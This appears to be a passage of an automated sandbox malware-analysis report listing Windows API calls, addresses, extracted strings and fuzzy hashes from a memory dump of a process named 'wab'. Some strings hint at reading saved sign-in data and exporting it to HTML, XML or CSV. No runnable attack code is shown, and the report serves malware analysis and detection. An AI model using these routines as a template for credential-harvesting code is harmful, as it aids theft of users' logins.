                    • API String ID: 438689982-2894717839
                    APIs
                    • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                    • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                    • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                    • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                    • EndDialog.USER32(?,00000002), ref: 00405C83
                    • EndDialog.USER32(?,00000001), ref: 00405C98
                      • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                      • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                    • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                    • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: Item$Dialog$MessageSend
                    • String ID:
                    • API String ID: 3975816621-0
                    APIs
                    • _wcsicmp.MSVCRT ref: 00444D09
                    • _wcsicmp.MSVCRT ref: 00444D1E
                    • _wcsicmp.MSVCRT ref: 00444D33
                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                      • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: _wcsicmp$wcslen$_memicmp
                    • String ID: .save$http://$https://$log profile$signIn
                    • API String ID: 1214746602-2708368587
                    APIs
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??2@$??3@$FocusInvalidateRectmemset
                    • String ID:
                    • API String ID: 2313361498-0
                    APIs
                    • GetClientRect.USER32(?,?), ref: 00405F65
                    • GetWindow.USER32(?,00000005), ref: 00405F7D
                    • GetWindow.USER32(00000000), ref: 00405F80
                      • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                    • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                    • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                    • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                    • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                    • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: Window$ItemMessageRectSend$Client
                    • String ID:
                    • API String ID: 2047574939-0
                    • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                    • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                    • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                    • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                    APIs
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                    • String ID:
                    • API String ID: 4218492932-0
                    • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                    • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                    • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                    • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                    APIs
                      • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                      • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                      • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A75D
                      • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A7AA
                    • memcpy.MSVCRT ref: 0044A8BF
                    • memcpy.MSVCRT ref: 0044A90C
                    • memcpy.MSVCRT ref: 0044A988
                      • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A422
                      • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A46E
                    • memcpy.MSVCRT ref: 0044A9D8
                    • memcpy.MSVCRT ref: 0044AA19
                    • memcpy.MSVCRT ref: 0044AA4A
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy$memset
                    • String ID: gj
                    • API String ID: 438689982-4203073231
                    • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                    • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                    • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                    • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy
                    • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                    • API String ID: 3510742995-2446657581
                    • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                    • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                    • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                    • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                    APIs
                    • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                    • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                    • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                    • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                    • memset.MSVCRT ref: 00405ABB
                    • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                    • SetFocus.USER32(?), ref: 00405B76
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: MessageSend$FocusItemmemset
                    • String ID:
                    • API String ID: 4281309102-0
                    • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                    • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                    • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                    • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: _snwprintfwcscat
                    • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                    • API String ID: 384018552-4153097237
                    • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                    • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                    • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                    • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ItemMenu$CountInfomemsetwcschr
                    • String ID: 0$6
                    • API String ID: 2029023288-3849865405
                    • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                    • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                    • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                    • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                    APIs
                      • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                    • memset.MSVCRT ref: 00405455
                    • memset.MSVCRT ref: 0040546C
                    • memset.MSVCRT ref: 00405483
                    • memcpy.MSVCRT ref: 00405498
                    • memcpy.MSVCRT ref: 004054AD
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$memcpy$ErrorLast
                    • String ID: 6$\
                    • API String ID: 404372293-1284684873
                    • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                    • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                    • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                    • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                    APIs
                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                    • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                    • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                    • wcscpy.MSVCRT ref: 0040A0D9
                    • wcscat.MSVCRT ref: 0040A0E6
                    • wcscat.MSVCRT ref: 0040A0F5
                    • wcscpy.MSVCRT ref: 0040A107
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                    • String ID:
                    • API String ID: 1331804452-0
                    • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                    • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                    • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                    • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                    APIs
                      • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                    • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                    • String ID: advapi32.dll
                    • API String ID: 2012295524-4050573280
                    • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                    • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                    • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                    • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                    APIs
                    Strings
                    • <%s>, xrefs: 004100A6
                    • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                    • <?xml version="1.0" ?>, xrefs: 0041007C
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$_snwprintf
                    • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                    • API String ID: 3473751417-2880344631
                    • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                    • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                    • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                    • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: wcscat$_snwprintfmemset
                    • String ID: %2.2X
                    • API String ID: 2521778956-791839006
                    • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                    • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                    • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                    • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: _snwprintfwcscpy
                    • String ID: dialog_%d$general$menu_%d$strings
                    • API String ID: 999028693-502967061
                    • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                    • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                    • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                    • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                    APIs
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy$memsetstrlen
                    • String ID:
                    • API String ID: 2350177629-0
                    • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                    • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                    • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                    • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset
                    • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                    • API String ID: 2221118986-1606337402
                    • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                    • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                    • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                    • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                    APIs
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcmpmemset$_mbscpymemcpystrlen
                    • String ID:
                    • API String ID: 265355444-0
                    • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                    • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                    • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                    • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                    APIs
                      • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                      • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                      • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                      • Part of subcall function 0040A9CE: ??3@YAXPAX@Z.MSVCRT ref: 0040A9DD
                    • memset.MSVCRT ref: 0040C439
                    • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                    • _wcsupr.MSVCRT ref: 0040C481
                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                      • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                      • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                      • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                    • memset.MSVCRT ref: 0040C4D0
                    • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                    • String ID:
                    • API String ID: 1973883786-0
                    • Opcode ID: 7b1cc3e9e28870269e7e0e76d5f0a110d3188fcb9cf6d5cab2ec752ccc6f38bd
                    • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                    • Opcode Fuzzy Hash: 7b1cc3e9e28870269e7e0e76d5f0a110d3188fcb9cf6d5cab2ec752ccc6f38bd
                    • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                    APIs
                    • memset.MSVCRT ref: 004116FF
                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                      • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                      • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                      • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                      • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                      • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                      • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                    • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                    • API String ID: 2618321458-3614832568
                    • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                    • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                    • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                    • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                    APIs
                    • memset.MSVCRT ref: 004185FC
                    • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0041860A
                    • ??3@YAXPAX@Z.MSVCRT ref: 00418650
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@AttributesFilememset
                    • String ID:
                    • API String ID: 776155459-0
                    • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                    • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                    • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                    • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                    APIs
                    • AreFileApisANSI.KERNEL32 ref: 004174FC
                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                    • malloc.MSVCRT ref: 00417524
                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                    • ??3@YAXPAX@Z.MSVCRT ref: 00417544
                    • ??3@YAXPAX@Z.MSVCRT ref: 00417562
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@ByteCharMultiWide$ApisFilemalloc
                    • String ID:
                    • API String ID: 2308052813-0
                    • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                    • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                    • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                    • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                    APIs
                    • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                    • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                    • ??3@YAXPAX@Z.MSVCRT ref: 0041822B
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: PathTemp$??3@
                    • String ID: %s\etilqs_$etilqs_
                    • API String ID: 1589464350-1420421710
                    • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                    • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                    • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                    • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                    APIs
                    • memset.MSVCRT ref: 0040FDD5
                      • Part of subcall function 00414E7F: memcpy.MSVCRT ref: 00414EFC
                      • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                      • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                    • _snwprintf.MSVCRT ref: 0040FE1F
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                    • String ID: <%s>%s</%s>$</item>$<item>
                    • API String ID: 1775345501-2769808009
                    • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                    • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                    • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                    • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                    APIs
                    • wcscpy.MSVCRT ref: 0041477F
                    • wcscpy.MSVCRT ref: 0041479A
                    • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General), ref: 004147C1
                    • CloseHandle.KERNEL32(00000000), ref: 004147C8
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: wcscpy$CloseCreateFileHandle
                    • String ID: General
                    • API String ID: 999786162-26480598
                    • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                    • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
